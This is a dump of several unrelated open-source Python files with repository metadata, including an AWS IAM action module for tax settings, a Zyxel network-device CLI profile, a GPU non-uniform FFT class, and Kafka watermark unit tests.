:param text_file: text file that contain all you word
:param stop_file: the stop word which can't be considered
:param color_img: the color map img
:param mask_file: the mask img for the word
:param out_file: output file path which should with sufix of png/jpg...
:param font_path: font path
'''
    segment = cut_file_text(text_file)  # was hard-coded to the default path, ignoring -t
    word_stat = word_statistics(segment, stop_file)  # was ignoring -s
if mask_file is None:
img = gen_word_cloud_rectangle(word_stat)
_show_and_save_img(img, out_file)
else:
img = gen_word_cloud_picture(word_stat, font_path, mask_file, color_img)
_show_and_save_img(img, out_file)
if __name__ == '__main__':
run(main)
|
5572bc4c4c3412cdc7cac1bd05ec55c00b2e3c45
|
8880226d2ca1c9448c44b3e9f21226a58e61ac93
|
/awacs/tax.py
|
bf7f70c6864dd531a7e8682201f50b3c836f5ac0
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
cloudtools/awacs
|
2f82958ccc7ba2177492c29c706a5737f19dd2d1
|
c449a9637f01c26e73b827a9f8d5cc7715bbbea2
|
refs/heads/main
| 2023-08-31T00:58:28.636568
| 2023-08-28T05:13:01
| 2023-08-28T05:13:01
| 9,062,692
| 385
| 107
|
BSD-2-Clause
| 2023-08-13T23:21:39
| 2013-03-27T20:16:27
|
Python
|
UTF-8
|
Python
| false
| false
| 1,222
|
py
|
tax.py
|
# Copyright (c) 2012-2021, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from typing import Optional
from .aws import Action as BaseAction
from .aws import BaseARN
service_name = "AWS Tax Settings"
prefix = "tax"
class Action(BaseAction):
def __init__(self, action: Optional[str] = None) -> None:
super().__init__(prefix, action)
class ARN(BaseARN):
def __init__(self, resource: str = "", region: str = "", account: str = "") -> None:
super().__init__(
service=prefix, resource=resource, region=region, account=account
)
BatchPutTaxRegistration = Action("BatchPutTaxRegistration")
DeleteTaxRegistration = Action("DeleteTaxRegistration")
GetExemptions = Action("GetExemptions")
GetTaxInheritance = Action("GetTaxInheritance")
GetTaxInterview = Action("GetTaxInterview")
GetTaxRegistration = Action("GetTaxRegistration")
GetTaxRegistrationDocument = Action("GetTaxRegistrationDocument")
ListTaxRegistrations = Action("ListTaxRegistrations")
PutTaxInheritance = Action("PutTaxInheritance")
PutTaxInterview = Action("PutTaxInterview")
PutTaxRegistration = Action("PutTaxRegistration")
UpdateExemptions = Action("UpdateExemptions")
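# Hedged usage sketch (illustrative only, not part of the upstream module):
# the Action constants above are normally embedded in an awacs IAM Statement.
# Allow and Statement are assumed to come from awacs.aws, as in the awacs README.
def _example_policy_statement():
    from .aws import Allow, Statement
    return Statement(
        Effect=Allow,
        Action=[GetTaxRegistration, ListTaxRegistrations],
        Resource=["*"],
    )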
|
123b6059e61f69a3b762a9955073e6db78086e2f
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/sa/profiles/Zyxel/ZyNOS_EE/profile.py
|
7346e9f2ccfa274a6846c1d9947b988bda2bb512
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 707
|
py
|
profile.py
|
# ---------------------------------------------------------------------
# Vendor: Zyxel
# OS: ZyNOS_EE
# ---------------------------------------------------------------------
# Copyright (C) 2007-2011 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC Modules
from noc.core.profile.base import BaseProfile
class Profile(BaseProfile):
name = "Zyxel.ZyNOS_EE"
pattern_password = b"Password: "
pattern_prompt = rb"^\S+?> "
pattern_more = [(rb"^-- more --.*?$", b" ")]
pattern_syntax_error = rb"^Valid commands are:"
command_exit = "exit"
enable_cli_session = False
command_save_config = "config save"
|
d8fadbec3995da0614c52b1113b47c3c90e873e2
|
23bcefab5154e9de3bba424464112a5b633e492f
|
/linalg/nufft_hsa.py
|
11b556d39e55105cd104d8093dd53aa167ee7bad
|
[
"MIT"
] |
permissive
|
jyhmiinlin/pynufft
|
8276d4de02907ba2ea168b248bf974c7a00d82e4
|
03e892ef2bc700745a9c4efd499c69df506afed5
|
refs/heads/master
| 2023-06-24T23:44:35.856229
| 2023-06-07T07:23:18
| 2023-06-07T07:23:18
| 49,985,083
| 180
| 22
|
NOASSERTION
| 2022-04-15T04:13:30
| 2016-01-19T21:41:26
|
Python
|
UTF-8
|
Python
| false
| false
| 33,094
|
py
|
nufft_hsa.py
|
"""
NUFFT HSA classes (deprecated)
=======================================
"""
from __future__ import absolute_import
import numpy
import warnings
import scipy.sparse
import numpy.fft
#import scipy.signal
import scipy.linalg
import scipy.special
from functools import wraps as _wraps
from ..src._helper import helper, helper1
class hypercube:
def __init__(self, shape, steps, invsteps, nelements, batch, dtype):
self.shape = shape
self.steps = steps
self.invsteps = invsteps
self.nelements = nelements
self.batch = batch
self.dtype = dtype
def push_cuda_context(hsa_method):
"""
Decorator to push up CUDA context to the top of the stack for current use
Add @push_cuda_context before the methods of NUFFT_hsa()
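    :Example:
    >>> # illustrative only; this is exactly how the methods below apply it
    >>> @push_cuda_context
    ... def release(self):
    ...     del self.thr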
"""
@_wraps(hsa_method)
def wrapper(*args, **kwargs):
try:
args[0].thr._context.push()
except:
pass
return hsa_method(*args, **kwargs)
return wrapper
class NUFFT_hsa:
"""
NUFFT_hsa class.
Multi-coil or single-coil memory reduced NUFFT.
"""
def __init__(self, API=None, platform_number=None, device_number=None,
verbosity=0):
"""
Constructor.
:param API: The API for the heterogeneous system. API='cuda'
or API='ocl'
:param platform_number: The number of the platform found by the API.
:param device_number: The number of the device found on the platform.
:param verbosity: Defines the verbosity level, default value is 0
:type API: string
:type platform_number: integer
:type device_number: integer
:type verbosity: integer
:returns: 0
:rtype: int, float
:Example:
>>> from pynufft import NUFFT_hsa
>>> NufftObj = NUFFT_hsa(API='cuda', platform_number=0,
device_number=0, verbosity=0)
"""
warnings.warn('In the future NUFFT_hsa and NUFFT_cpu api will'
' be merged', FutureWarning)
self.dtype = numpy.complex64
self.verbosity = verbosity
import reikna.cluda as cluda
if self.verbosity > 0:
            print('The chosen API by the user is ', API)
self.cuda_flag, self.ocl_flag = helper.diagnose(
verbosity=self.verbosity)
if None is API:
            if self.cuda_flag == 1:
                API = 'cuda'
            elif self.ocl_flag == 1:
API = 'ocl'
else:
warnings.warn('No parallelization will be made since no GPU '
'device has been detected.', UserWarning)
        else:
            api = API
        self.API = API  # remember the backend name so set_wavefront() can recompile kernels
if self.verbosity > 0:
print('The used API will be ', API)
if platform_number is None:
platform_number = 0
if device_number is None:
device_number = 0
from reikna import cluda
import reikna.transformations
from reikna.cluda import functions, dtypes
try: # try to create api/platform/device using the given parameters
if 'cuda' == API:
api = cluda.cuda_api()
elif 'ocl' == API:
api = cluda.ocl_api()
platform = api.get_platforms()[platform_number]
device = platform.get_devices()[device_number]
except: # if failed, find out what's going wrong?
warnings.warn('No parallelization will be made since no GPU '
'device has been detected.', UserWarning)
# return 1
# Create context from device
self.thr = api.Thread(device) # pyopencl.create_some_context()
self.device = device # : device name
if self.verbosity > 0:
print('Using opencl or cuda = ', self.thr.api)
# """
# Wavefront: as warp in cuda. Can control the width in a workgroup
# Wavefront is required in spmv_vector as it improves data coalescence.
# see cCSR_spmv and zSparseMatVec
# """
self.wavefront = api.DeviceParameters(device).warp_size
if self.verbosity > 0:
            print('Wavefront of OpenCL (warp in CUDA terms) = ', self.wavefront)
from ..src import re_subroutine # import create_kernel_sets
kernel_sets = re_subroutine.create_kernel_sets(API)
prg = self.thr.compile(kernel_sets,
render_kwds=dict(LL=str(self.wavefront)),
fast_math=False)
self.prg = prg
    def set_wavefront(self, wf):
        self.wavefront = int(wf)  # was int(wt), an undefined name
        if self.verbosity > 0:
            print('Wavefront of OpenCL (warp in CUDA terms) = ', self.wavefront)
        from ..src import re_subroutine  # import create_kernel_sets
        kernel_sets = re_subroutine.create_kernel_sets(self.API)  # was the undefined name API
        prg = self.thr.compile(kernel_sets,
                               render_kwds=dict(LL=str(self.wavefront)),
                               fast_math=False)
        self.prg = prg
def plan(self, om, Nd, Kd, Jd, ft_axes=None, batch=None, radix=None):
"""
Design the multi-coil or single-coil memory reduced interpolator.
:param om: The M off-grid locations in the frequency domain.
Normalized between [-pi, pi]
:param Nd: The matrix size of equispaced image.
Example: Nd=(256, 256) for a 2D image;
Nd = (128, 128, 128) for a 3D image
:param Kd: The matrix size of the oversampled frequency grid.
Example: Kd=(512,512) for 2D image;
Kd = (256,256,256) for a 3D image
:param Jd: The interpolator size.
Example: Jd=(6,6) for 2D image;
Jd = (6,6,6) for a 3D image
:param ft_axes: The dimensions to be transformed by FFT.
Example: ft_axes = (0, 1) for 2D,
ft_axes = (0, 1, 2) for 3D;
ft_axes = None for all dimensions.
:param batch: Batch NUFFT.
If provided, the shape is Nd + (batch, ).
The last axis is the number of parallel coils.
batch = None for single coil.
        :param radix: Radix option forwarded to the planner (helper.plan).
                       radix = None uses the planner's default.
:type om: numpy.float array, matrix size = (M, ndims)
:type Nd: tuple, ndims integer elements.
:type Kd: tuple, ndims integer elements.
:type Jd: tuple, ndims integer elements.
:type ft_axes: tuple, selected axes to be transformed.
:type batch: int or None
:returns: 0
:rtype: int, float
:Example:
>>> from pynufft import NUFFT_hsa
>>> NufftObj = NUFFT_hsa()
>>> NufftObj.plan(om, Nd, Kd, Jd)
"""
self.ndims = len(Nd) # dimension
if ft_axes is None:
ft_axes = range(0, self.ndims)
self.ft_axes = ft_axes
self.st = helper.plan(om, Nd, Kd, Jd, ft_axes=ft_axes,
format='pELL', radix=radix)
if batch is None:
self.parallel_flag = 0
else:
self.parallel_flag = 1
if batch is None:
self.batch = numpy.uint32(1)
else:
self.batch = numpy.uint32(batch)
self.Nd = self.st['Nd'] # backup
self.Kd = self.st['Kd']
# self.sn = numpy.asarray(self.st['sn'].astype(self.dtype),
# order='C')# backup
if self.batch == 1 and (self.parallel_flag == 0):
self.multi_Nd = self.Nd
self.multi_Kd = self.Kd
self.multi_M = (self.st['M'], )
# Broadcasting the sense and scaling factor (Roll-off)
# self.sense2 = self.sense*numpy.reshape(self.sn, self.Nd + (1, ))
        else:  # batched / multi-coil case
self.multi_Nd = self.Nd + (self.batch, )
self.multi_Kd = self.Kd + (self.batch, )
self.multi_M = (self.st['M'], ) + (self.batch, )
self.invbatch = 1.0 / self.batch
self.Kdprod = numpy.uint32(numpy.prod(self.st['Kd']))
self.Jdprod = numpy.uint32(numpy.prod(self.st['Jd']))
self.Ndprod = numpy.uint32(numpy.prod(self.st['Nd']))
self.Nd_elements, self.invNd_elements = helper.strides_divide_itemsize(
self.st['Nd'])
# only return the Kd_elements
self.Kd_elements = helper.strides_divide_itemsize(self.st['Kd'])[0]
self.NdCPUorder, self.KdCPUorder, self.nelem = helper.preindex_copy(
self.st['Nd'],
self.st['Kd'])
self.offload()
return 0
@push_cuda_context
def offload(self): # API, platform_number=0, device_number=0):
"""
self.offload():
Off-load NUFFT to the opencl or cuda device(s)
:param API: define the device type, which can be 'cuda' or 'ocl'
:param platform_number: define which platform to be used.
The default platform_number = 0.
:param device_number: define which device to be used.
The default device_number = 0.
:type API: string
:type platform_number: int
:type device_number: int
:return: self: instance
"""
self.pELL = {} # dictionary
self.pELL['nRow'] = numpy.uint32(self.st['pELL'].nRow)
self.pELL['prodJd'] = numpy.uint32(self.st['pELL'].prodJd)
self.pELL['sumJd'] = numpy.uint32(self.st['pELL'].sumJd)
self.pELL['dim'] = numpy.uint32(self.st['pELL'].dim)
self.pELL['Jd'] = self.thr.to_device(
self.st['pELL'].Jd.astype(numpy.uint32))
self.pELL['meshindex'] = self.thr.to_device(
self.st['pELL'].meshindex.astype(numpy.uint32))
self.pELL['kindx'] = self.thr.to_device(
self.st['pELL'].kindx.astype(numpy.uint32))
self.pELL['udata'] = self.thr.to_device(
self.st['pELL'].udata.astype(self.dtype))
self.volume = {}
self.volume['Nd_elements'] = self.thr.to_device(
numpy.asarray(self.Nd_elements, dtype=numpy.uint32))
self.volume['Kd_elements'] = self.thr.to_device(
numpy.asarray(self.Kd_elements, dtype=numpy.uint32))
self.volume['invNd_elements'] = self.thr.to_device(
self.invNd_elements.astype(numpy.float32))
self.volume['Nd'] = self.thr.to_device(numpy.asarray(
self.st['Nd'], dtype=numpy.uint32))
self.volume['NdGPUorder'] = self.thr.to_device(self.NdCPUorder)
self.volume['KdGPUorder'] = self.thr.to_device(self.KdCPUorder)
self.volume['gpu_coil_profile'] = self.thr.array(
self.multi_Nd, dtype=self.dtype).fill(1.0)
Nd = self.st['Nd']
# tensor_sn = numpy.empty((numpy.sum(Nd), ), dtype=numpy.float32)
#
# shift = 0
# for dimid in range(0, len(Nd)):
#
# tensor_sn[shift :shift + Nd[dimid]] = \
# self.st['tensor_sn'][dimid][:, 0].real
# shift = shift + Nd[dimid]
# self.volume['tensor_sn'] = self.thr.to_device(
# self.st['tensor_sn'].astype(numpy.float32))
self.tSN = {}
self.tSN['Td_elements'] = self.thr.to_device(
numpy.asarray(self.st['tSN'].Td_elements, dtype=numpy.uint32))
self.tSN['invTd_elements'] = self.thr.to_device(
self.st['tSN'].invTd_elements.astype(numpy.float32))
self.tSN['Td'] = self.thr.to_device(
numpy.asarray(self.st['tSN'].Td, dtype=numpy.uint32))
self.tSN['Tdims'] = self.st['tSN'].Tdims
self.tSN['tensor_sn'] = self.thr.to_device(
self.st['tSN'].tensor_sn.astype(numpy.float32))
self.Ndprod = numpy.int32(numpy.prod(self.st['Nd']))
self.Kdprod = numpy.int32(numpy.prod(self.st['Kd']))
self.M = numpy.int32(self.st['M'])
import reikna.fft
if self.batch > 1: # batch mode
self.fft = reikna.fft.FFT(
numpy.empty(self.st['Kd']+(self.batch, ), dtype=self.dtype),
self.ft_axes).compile(self.thr, fast_math=False)
        else:  # single-coil case (self.batch == 1): plan the FFT without a batch axis
self.fft = reikna.fft.FFT(
numpy.empty(self.st['Kd'], dtype=self.dtype),
self.ft_axes).compile(self.thr, fast_math=False)
self.zero_scalar = self.dtype(0.0+0.0j)
del self.st['pELL']
if self.verbosity > 0:
print('End of offload')
@push_cuda_context
def reset_sense(self):
self.volume['gpu_coil_profile'].fill(1.0)
@push_cuda_context
def set_sense(self, coil_profile):
if coil_profile.shape != self.multi_Nd:
print('The shape of coil_profile is ', coil_profile.shape)
print('But it should be', self.Nd + (self.batch, ))
raise ValueError
else:
self.volume['gpu_coil_profile'] = self.thr.to_device(
coil_profile.astype(self.dtype))
if self.verbosity > 0:
print('Successfully loading coil sensitivities!')
# if coil_profile.shape == self.Nd + (self.batch, ):
@push_cuda_context
def to_device(self, image, shape=None):
g_image = self.thr.array(image.shape, dtype=self.dtype)
self.thr.to_device(image.astype(self.dtype), dest=g_image)
return g_image
@push_cuda_context
def s2x(self, s):
x = self.thr.array(self.multi_Nd, dtype=self.dtype)
# print("Now populate the array to multi-coil")
self.prg.cPopulate(
self.batch,
self.Ndprod,
s,
x,
local_size=None,
global_size=int(self.batch * self.Ndprod))
# x2 = x * self.volume['gpu_coil_profile']
# try:
# x2 = x * self.volume['gpu_coil_profile']
# except:
# x2 = x
self.prg.cMultiplyVecInplace(
numpy.uint32(1),
self.volume['gpu_coil_profile'],
x,
local_size=None,
global_size=int(self.batch*self.Ndprod))
# self.prg.cDistribute(
# self.batch,
# self.Ndprod,
# self.volume['gpu_coil_profile'],
# s,
# x,
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
return x
@push_cuda_context
def x2xx(self, x):
# xx = self.thr.array(xx.shape, dtype = self.dtype)
# self.thr.copy_array(z, dest=xx, )
# size = int(xx.nbytes/xx.dtype.itemsize))
# Hack of error in cuda backends; 8 is the byte of numpy.complex64
# size = int(xx.nbytes/8)
xx = self.thr.array(x.shape, dtype=self.dtype)
self.thr.copy_array(x, dest=xx, )
# size = int(xx.nbytes/xx.dtype.itemsize))
# Hack of error in cuda backends; 8 is the byte of numpy.complex64:
# size = int(xx.nbytes/8)
# self.prg.cMultiplyRealInplace(
# self.batch,
# self.volume['SnGPUArray'],
# xx,
# local_size=None,
# global_size=int(self.Ndprod*self.batch))
# self.prg.cTensorMultiply(numpy.uint32(self.batch),
# numpy.uint32(self.ndims),
# self.volume['Nd'],
# self.volume['Nd_elements'],
# self.volume['invNd_elements'],
# self.volume['tensor_sn'],
# xx,
# numpy.uint32(0),
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
self.prg.cTensorMultiply(numpy.uint32(self.batch),
numpy.uint32(self.tSN['Tdims']),
self.tSN['Td'],
self.tSN['Td_elements'],
self.tSN['invTd_elements'],
self.tSN['tensor_sn'],
xx,
numpy.uint32(0),
local_size=None,
global_size=int(self.batch*self.Ndprod))
# self.thr.synchronize()
return xx
@push_cuda_context
def xx2k(self, xx):
"""
Private: oversampled FFT on the heterogeneous device
First, zeroing the self.k_Kd array
Second, copy self.x_Nd array to self.k_Kd array by cSelect
Third, inplace FFT
"""
k = self.thr.array(self.multi_Kd, dtype=self.dtype)
# k = self.thr.array(self.multi_Kd, dtype=self.dtype).fill(0.0 + 0.0j)
k.fill(0)
# self.prg.cMultiplyScalar(self.zero_scalar,
# k,
# local_size=None,
# global_size=int(self.Kdprod))
# # self.prg.cSelect(self.NdGPUorder,
# self.KdGPUorder,
# xx,
# k,
# local_size=None,
# global_size=int(self.Ndprod))
# self.prg.cSelect2(self.batch,
# self.volume['NdGPUorder'],
# self.volume['KdGPUorder'],
# xx,
# k,
# local_size=None,
# global_size=int(self.Ndprod*self.batch))
self.prg.cTensorCopy(
self.batch,
numpy.uint32(self.ndims),
self.volume['Nd_elements'],
self.volume['Kd_elements'],
self.volume['invNd_elements'],
xx,
k,
numpy.int32(1), # Directions: Nd -> Kd, 1; Kd -> Nd, -1
local_size=None,
global_size=int(self.Ndprod))
self.fft(k, k, inverse=False)
# self.thr.synchronize()
return k
@push_cuda_context
def k2y(self, k):
"""
Private: interpolation by the Sparse Matrix-Vector Multiplication
"""
# if self.parallel_flag is 1:
# y =self.thr.array((self.st['M'], self.batch),
# dtype=self.dtype).fill(0)
# else:
# y =self.thr.array( (self.st['M'], ), dtype=self.dtype).fill(0)
y = self.thr.array(self.multi_M, dtype=self.dtype).fill(0)
self.prg.pELL_spmv_mCoil(
self.batch,
self.pELL['nRow'],
self.pELL['prodJd'],
self.pELL['sumJd'],
self.pELL['dim'],
self.pELL['Jd'],
# self.pELL_currsumJd,
self.pELL['meshindex'],
self.pELL['kindx'],
self.pELL['udata'],
k,
y,
local_size=int(self.wavefront),
global_size=int(self.pELL['nRow'] *
self.batch * self.wavefront)
)
# self.thr.synchronize()
return y
@push_cuda_context
def y2k(self, y):
"""
Private: gridding by the Sparse Matrix-Vector Multiplication
However, serial atomic add is far too slow and inaccurate.
"""
# kx = self.thr.array(self.multi_Kd, dtype=numpy.float32).fill(0.0)
# ky = self.thr.array(self.multi_Kd, dtype=numpy.float32).fill(0.0)
k = self.thr.array(self.multi_Kd, dtype=numpy.complex64).fill(0.0)
res = self.thr.array(self.multi_Kd, dtype=numpy.complex64).fill(0.0)
# array which saves the residue of two sum
self.prg.pELL_spmvh_mCoil(
self.batch,
self.pELL['nRow'],
self.pELL['prodJd'],
self.pELL['sumJd'],
self.pELL['dim'],
self.pELL['Jd'],
self.pELL['meshindex'],
self.pELL['kindx'],
self.pELL['udata'],
# kx, ky,
k,
res,
y,
local_size=None,
global_size=int(self.pELL['nRow']*self.batch )#*
# int(self.pELL['prodJd']) * int(self.batch))
)
return k + res
@push_cuda_context
def k2xx(self, k):
"""
Private: the inverse FFT and image cropping (which is the reverse of
_xx2k() method)
"""
self.fft(k, k, inverse=True)
# self.thr.synchronize()
# self.x_Nd._zero_fill()
# self.prg.cMultiplyScalar(self.zero_scalar,
# xx,
# local_size=None,
# global_size=int(self.Ndprod))
# if self.parallel_flag is 1:
# xx = self.thr.array(self.st['Nd']+(self.batch, ),
# dtype = self.dtype)
# else:
# xx = self.thr.array(self.st['Nd'], dtype = self.dtype)
xx = self.thr.array(self.multi_Nd, dtype=self.dtype)
xx.fill(0)
# self.prg.cSelect(self.queue,
# (self.Ndprod,),
# None,
# self.volume['KdGPUorder'].data,
# self.NdGPUorder.data,
# self.k_Kd2.data,
# self.x_Nd.data)
# self.prg.cSelect2(self.batch,
# self.volume['KdGPUorder'],
# self.volume['NdGPUorder'],
# k,
# xx,
# local_size=None,
# global_size=int(self.Ndprod*self.batch))
self.prg.cTensorCopy(
self.batch,
numpy.uint32(self.ndims),
self.volume['Nd_elements'],
self.volume['Kd_elements'],
self.volume['invNd_elements'],
k,
xx,
numpy.int32(-1),
local_size=None,
global_size=int(self.Ndprod))
return xx
@push_cuda_context
def xx2x(self, xx):
x = self.thr.array(xx.shape, dtype=self.dtype)
self.thr.copy_array(xx, dest=x, )
# size = int(xx.nbytes/xx.dtype.itemsize))
# Hack of error in cuda backends; 8 is the byte of numpy.complex64
# size = int(xx.nbytes/8)
# self.prg.cMultiplyRealInplace(self.batch,
# self.volume['SnGPUArray'],
# z,
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
# self.prg.cTensorMultiply(numpy.uint32(self.batch),
# numpy.uint32(self.ndims),
# self.volume['Nd'],
# self.volume['Nd_elements'],
# self.volume['invNd_elements'],
# self.volume['tensor_sn'],
# x,
# numpy.uint32(0),
# local_size=None,
# global_size=int(self.batch*self.Ndprod))
self.prg.cTensorMultiply(numpy.uint32(self.batch),
numpy.uint32(self.tSN['Tdims']),
self.tSN['Td'],
self.tSN['Td_elements'],
self.tSN['invTd_elements'],
self.tSN['tensor_sn'],
x,
numpy.uint32(0),
local_size=None,
global_size=int(self.batch *
self.Ndprod))
# self.thr.synchronize()
return x
@push_cuda_context
def x2s(self, x):
s = self.thr.array(self.st['Nd'], dtype=self.dtype)
# try:
self.prg.cMultiplyConjVecInplace(
numpy.uint32(1),
self.volume['gpu_coil_profile'],
x,
local_size=None,
global_size=int(self.batch*self.Ndprod))
# x2 = x * self.volume['gpu_coil_profile'].conj()
# except:
# x2 = x
self.prg.cAggregate(
self.batch,
self.Ndprod,
x,
s,
local_size=int(self.wavefront),
global_size=int(self.batch*self.Ndprod*self.wavefront))
# self.prg.cMerge(self.batch,
# self.Ndprod,
# self.volume['gpu_coil_profile'],
# x,
# s,
# local_size=int(self.wavefront),
# global_size = int(self.batch*self.Ndprod*
# self.wavefront))
return s
@push_cuda_context
def selfadjoint_one2many2one(self, gx):
"""
selfadjoint_one2many2one NUFFT on the heterogeneous device
:param gx: The input gpu array, with size=Nd
:type gx: reikna gpu array with dtype =numpy.complex64
:return: gx: The output gpu array, with size=Nd
:rtype: reikna gpu array with dtype =numpy.complex64
"""
gy = self.forward_one2many(gx)
gx2 = self.adjoint_many2one(gy)
del gy
return gx2
def selfadjoint(self, gx):
"""
selfadjoint NUFFT on the heterogeneous device
:param gx: The input gpu array, with size=Nd
:type gx: reikna gpu array with dtype =numpy.complex64
:return: gx: The output gpu array, with size=Nd
:rtype: reikna gpu array with dtype =numpy.complex64
"""
gy = self.forward(gx)
gx2 = self.adjoint(gy)
del gy
return gx2
@push_cuda_context
def forward(self, gx):
"""
Forward NUFFT on the heterogeneous device
:param gx: The input gpu array, with size = Nd
:type gx: reikna gpu array with dtype = numpy.complex64
:return: gy: The output gpu array, with size = (M,)
:rtype: reikna gpu array with dtype = numpy.complex64
"""
try:
xx = self.x2xx(gx)
except: # gx is not a gpu array
try:
warnings.warn('The input array may not be a GPUarray '
'Automatically moving the input array to gpu, '
'which is throttled by PCIe.', UserWarning)
px = self.to_device(gx, )
# pz = self.thr.to_device(numpy.asarray(gz.astype(self.dtype),
# order = 'C' ))
xx = self.x2xx(px)
except:
if gx.shape != self.Nd + (self.batch, ):
warnings.warn('Shape of the input is ' + str(gx.shape) +
' while it should be ' +
str(self.Nd+(self.batch, )), UserWarning)
raise
k = self.xx2k(xx)
del xx
gy = self.k2y(k)
del k
return gy
@push_cuda_context
def forward_one2many(self, s):
try:
x = self.s2x(s)
        except:  # s is not a gpu array
try:
warnings.warn('In s2x(): The input array may not be '
'a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
ps = self.to_device(s, )
# px = self.thr.to_device(numpy.asarray(x.astype(self.dtype),
# order = 'C' ))
x = self.s2x(ps)
except:
if s.shape != self.Nd:
                warnings.warn('Shape of the input is ' + str(s.shape) +
' while it should be ' +
str(self.Nd), UserWarning)
raise
y = self.forward(x)
return y
@push_cuda_context
def adjoint_many2one(self, y):
try:
x = self.adjoint(y)
        except:  # y is not a gpu array
try:
if self.verbosity > 0:
print('y.shape = ', y.shape)
warnings.warn('In adjoint_many2one(): The input array may not '
'be a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
py = self.to_device(y, )
# py = self.thr.to_device(numpy.asarray(y.astype(self.dtype),
# order = 'C' ))
x = self.adjoint(py)
except:
print('Failed at self.adjoint_many2one! Please check the gy'
' shape, type and stride.')
raise
# z = self.adjoint(y)
s = self.x2s(x)
return s
@push_cuda_context
def adjoint(self, gy):
"""
Adjoint NUFFT on the heterogeneous device
:param gy: The input gpu array, with size=(M,)
:type: reikna gpu array with dtype =numpy.complex64
:return: gx: The output gpu array, with size=Nd
:rtype: reikna gpu array with dtype =numpy.complex64
"""
try:
k = self.y2k(gy)
        except:  # gy is not a gpu array
try:
warnings.warn('In adjoint(): The input array may not '
'be a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
py = self.to_device(gy, )
# py = self.thr.to_device(numpy.asarray(gy.astype(self.dtype),
# order = 'C' ))
k = self.y2k(py)
except:
                print('Failed at self.adjoint! Please check the gy shape, '
                      'type, stride.')
raise
# k = self.y2k(gy)
xx = self.k2xx(k)
del k
gx = self.xx2x(xx)
del xx
return gx
@push_cuda_context
def release(self):
del self.volume
del self.prg
del self.pELL
self.thr.release()
del self.thr
@push_cuda_context
def solve(self, gy, solver=None, *args, **kwargs):
"""
The solver of NUFFT_hsa
:param gy: data, reikna array, (M,) size
:param solver: could be 'cg', 'L1TVOLS', 'L1TVLAD'
:param maxiter: the number of iterations
:type gy: reikna array, dtype = numpy.complex64
:type solver: string
:type maxiter: int
:return: reikna array with size Nd
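        :Example:
        >>> # illustrative only: assumes plan() has already been called and gy
        >>> # is a reikna gpu array on the same device
        >>> gx = NufftObj.solve(gy, solver='cg', maxiter=30)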
"""
from ..linalg.solve_hsa import solve
try:
return solve(self, gy, solver, *args, **kwargs)
except:
try:
warnings.warn('In solve(): The input array may not '
'be a GPUarray. Automatically moving the input'
' array to gpu, which is throttled by PCIe.',
UserWarning)
py = self.to_device(gy, )
return solve(self, py, solver, *args, **kwargs)
except:
if numpy.ndarray == type(gy):
print("Input gy must be a reikna array with dtype ="
" numpy.complex64")
raise # TypeError
else:
print("wrong")
raise # TypeError
|
a63e55f45fc6c1e315655e8ca1e265990b836bfa
|
3083a4918f9a9a0670ce83566341eba04b290bc4
|
/tests/kafka_consumer_manager/test_watermark_get.py
|
a1c098aaa0bae4283625dce98711b5513b72525d
|
[
"Apache-2.0"
] |
permissive
|
Yelp/kafka-utils
|
b122c0aad0dfc225e948623ceaf466e7e63d9f91
|
def433ec4d07c60290d5dc937d3b4e5189eca9dc
|
refs/heads/master
| 2023-08-31T06:20:33.740273
| 2023-08-24T10:15:43
| 2023-08-24T10:15:43
| 55,727,134
| 322
| 142
|
Apache-2.0
| 2023-08-24T10:15:44
| 2016-04-07T20:50:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,168
|
py
|
test_watermark_get.py
|
# Copyright 2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
import pytest
from kafka_utils.kafka_consumer_manager. \
commands.watermark_get import WatermarkGet
class TestGetWatermark:
    @pytest.fixture  # pytest.yield_fixture is deprecated; a plain fixture supports yield
def client(self):
with mock.patch(
'kafka_utils.kafka_consumer_manager.'
'commands.watermark_get.KafkaToolClient',
autospec=True,
) as mock_client:
yield mock_client
def test_get_watermark_for_topic(self, client):
topics = '__consumer_offsets'
client.topic_partitions = {}
with mock.patch(
'kafka_utils.kafka_consumer_manager.commands.'
'watermark_get.get_watermark_for_topic',
return_value={'test_topic': [1, 99, 3]},
autospec=True,
) as mock_get_watermark:
WatermarkGet.get_watermarks(
client,
topics,
exact=True
)
assert mock_get_watermark.call_count == 1
def test_get_watermark_for_regex(self, client):
topics = '__consumer_*'
client.topic_partitions = {}
with mock.patch(
'kafka_utils.kafka_consumer_manager.commands.'
'watermark_get.get_watermark_for_regex',
return_value={'__consumer_1': [1, 99, 3],
'__consumer_2': [2, 100, 2]},
autospec=True,
) as mock_get_watermark:
WatermarkGet.get_watermarks(
client,
topics,
exact=False
)
assert mock_get_watermark.call_count == 1
|
d7b5e734eae128fb0949d8d50728676b09f43e86
|
2d05050d0ada29f7680b4df20c10bb85b0530e45
|
/python/tvm/target/generic_func.py
|
7b6f916bd9755bb4f0ccd44fd0f8638dc199ccc4
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"Zlib",
"LLVM-exception",
"BSD-2-Clause"
] |
permissive
|
apache/tvm
|
